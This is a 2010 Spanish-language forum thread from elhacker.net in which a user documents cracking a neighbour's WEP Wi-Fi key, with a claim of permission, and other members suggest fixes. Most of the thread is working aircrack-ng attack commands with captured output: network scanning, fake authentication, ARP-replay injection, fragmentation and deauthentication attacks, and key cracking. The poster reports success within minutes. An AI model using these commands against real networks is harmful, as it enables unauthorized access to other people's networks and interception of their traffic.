elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  [Seguimientos/Crónicas]Cracking wifi - Ataque básico
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Seguimientos/Crónicas]Cracking wifi - Ataque básico  (Leído 4,333 veces)
Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
[Seguimientos/Crónicas]Cracking wifi - Ataque básico
« en: 24 Junio 2010, 17:40 pm »

ATAQUE WIFI BÁSICO


Hola a todos, hoy me he propuesto crackear la contraseña del wifi, de mi vecino, que por supuesto tengo permiso, me he informado, he leido, he estudiado y he llegado a la conclusion del siguiente ataque:

Primero de todo analizo el perimetro de redes wifi:

airodump-ng mon0

Código:
 CH 11 ][ Elapsed: 1 min ][ 2010-06-24 17:22

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:22:___________ -49       33       29    0   1  54e. WEP  WEP    OPN  WLAN_____
 00:15:___________-82       46        0    0  11  54   WEP  WEP         Jazztel ______

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:22:___________  00:08:___________    0    1e- 1e   606      156  WLAN______

Bieeen tengo la red que yo queria crackear, en mi caso Jazztel _____, por tanto me centro en su canal de comunicacion:

airodump-ng -w wep -c 11 --bssid 00:15:___________ mon0

Y empiezo a ver sus datos concretos:

Código:
CH 11 ][ Elapsed: 5 mins ][ 2010-06-24 17:29 ][ fixed channel mon0: 1

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:15:___________  -80   4     1830        0    0  11  54   WEP  WEP    OPN  Jazztel ___

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:15:___________  00:08:___________    0    1 - 1      0        9

Ahora empieza el ataque para comenzar a capturar paquetes, para lo cual, primero tengo que inyectarle y hacer una autentificación falsa:

aireplay-ng -1 0 -a 00:15:___________ mon0


Y la asociacion de AP transcurre satisfactoriamente:

Código:
No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:28:02  Waiting for beacon frame (BSSID: 00:15:___________) on channel 11

17:28:02  Sending Authentication Request (Open System) [ACK]
17:28:02  Authentication successful
17:28:02  Sending Association Request [ACK]
17:28:02  Association successful :-) (AID: 1)

Ahora empieza la captura de trafico y arp:

aireplay-ng -3 -b 00:15:___________ mon0


Código:
No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:25:46  Waiting for beacon frame (BSSID: 00:15:___________) on channel 11
Saving ARP requests in replay_arp-0624-172546.cap
You should also start airodump-ng to capture replies.
2007 packets (got 0 ARP requests and 20 ACKs), sent 0 packets...(0 pps)

Y por mucho que espero no suben los data, estudiando la situación he llegado a la conclusion de que esto ocurre porque no hay ningun cliente asociado que genere trafico de red, y creo que eso se hace en el punto dos de mi ataque, lo que ocurre es que me autentifico falso y al rato me kickea de la falsa autentificación.

Esto es una guia de ataque básico y al mismo tiempo mi duda.

Alguien sabe como puedo solventar este problema sin tener que esperar a que mi vecino empieze a navegar/descargar, en general usar su red?

Saludos y gracias por vuestra atención.
« Última modificación: 24 Junio 2010, 17:51 pm por ChimoC » En línea

jcrack

Desconectado Desconectado

Mensajes: 150


Ver Perfil
Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico
« Respuesta #1 en: 24 Junio 2010, 22:47 pm »

 hola  ;D
despues de ataque 1 autenticacion falsa prueba  ataque 5 de fragmentacion asi:
 aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0
 debe salir la carita feliz y aparece OPEN debajo de auth
 aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0
................
................
si no funciona cambia el ataque 5 por el 0  :
aireplay-ng -0 5 -a (bssid) wlan0
aircrack-ng -n 64 -b (bssid) archivo-01.cap

................
me avisas como te fue
gracias
En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico
« Respuesta #2 en: 24 Junio 2010, 23:19 pm »

hola  ;D
despues de ataque 1 autenticacion falsa prueba  ataque 5 de fragmentacion asi:
 aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0
 debe salir la carita feliz y aparece OPEN debajo de auth
 aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0
................
................
si no funciona cambia el ataque 5 por el 0  :
aireplay-ng -0 5 -a (bssid) wlan0
aircrack-ng -n 64 -b (bssid) archivo-01.cap

................
me avisas como te fue
gracias
Lo de open ya me salia, pero no ocurria nada mas.

Saludos
En línea

dani__

Desconectado Desconectado

Mensajes: 126


Always learning...


Ver Perfil
Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico
« Respuesta #3 en: 24 Junio 2010, 23:31 pm »

para generar tráfico con nuestra propia tarjeta deberemos echar mano del tuto que Heavyloto ya publicó en su día para tal fin, y nosotros vamos a usar ahora.

Una vez empezado todo el proceso y viendo que no suben las datas, debemos fijarnos si hay clientes conectados. En caso afirmativo debemos asociarnos con un cliente y para ello abriremos Shell y escribiremos en la misma:


Código:
Código:
aireplay-ng -3 –b (Mac víctima) –h (Mac cliente) (las siglas de nuestra interface)

Esto es un A3. Reinyección de petición ARP.

Una vez presionemos enter, veremos como en algunos casos, las datas comienzan a moverse, en ocasiones de una forma escandalosa, pero es lo que queremos no?. Falta aclarar que es posible que tardemos en capturar peticiones ARP, y este factor es mas que  IMPORTANTE, ya que necesitamos de ellas, y si no hay tráfico el ataque no resultará efectivo.
En el caso de que no haya ningún cliente, o aunque lo haya, no exista tráfico entre el AP y el cliente, deberemos generarlo nosotros mismos, utilizando para ello nuestra propia tarjeta. Para esto abrimos Shell, y escribiremos lo siguiente:


Código:
Código:
aireplay-ng -1 30 –o 1 –e (nombre del Ap) –a (Mac victima) –h (nuestra Mac) (nuestra interface)

Ahora hemos lanzado un A1. Ataque 1. Autentificación falsa

Esto hace que nosotros mismos nos asociemos como un cliente, y solo nos queda repetir el primer ataque, pues ahora ya hay cliente, nosotros mismos.

fuente:http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html

Suerte.
« Última modificación: 24 Junio 2010, 23:34 pm por dani__ » En línea

Debci
Wiki

Desconectado Desconectado

Mensajes: 2.021


Actualizate o muere!


Ver Perfil WWW
Re: [Seguimientos/Crónicas]Cracking wifi - Ataque básico
« Respuesta #4 en: 25 Junio 2010, 09:18 am »

Conseguido, en poco menos de 5 minutos madre mia...
solo que a veces consigo que suban a velocidad bestial los ivs y otrs veces tengo que hacer la falsa autentificacion y posteriormente un aireplay-ng -3 para conseguir trafico de red.

Saludos
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[HOW TO] Ataque modelo Wifi « 1 2 ... 10 11 »
Hacking
kamsky 104 138,423 Último mensaje 15 Febrero 2012, 01:47 am
por CodeJiyu
WIFITE – Mass Wifi WEP/WPA Key Cracking Tool « 1 2 3 »
Wireless en Linux
P4nd3m0n1um 25 37,233 Último mensaje 4 Septiembre 2012, 01:43 am
por chanli
[MOD] ataque de deautenticación Wifi
Hacking Wireless
HalconEye 4 3,903 Último mensaje 6 Mayo 2012, 13:51 pm
por HalconEye
ataque dos a una wifi?
Hacking Wireless
Kase 1 3,106 Último mensaje 25 Septiembre 2012, 09:42 am
por ChimoC
Ataque de deautenticación Wifi
Hacking Wireless
valdragas 2 2,753 Último mensaje 13 Enero 2013, 19:14 pm
por valdragas
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines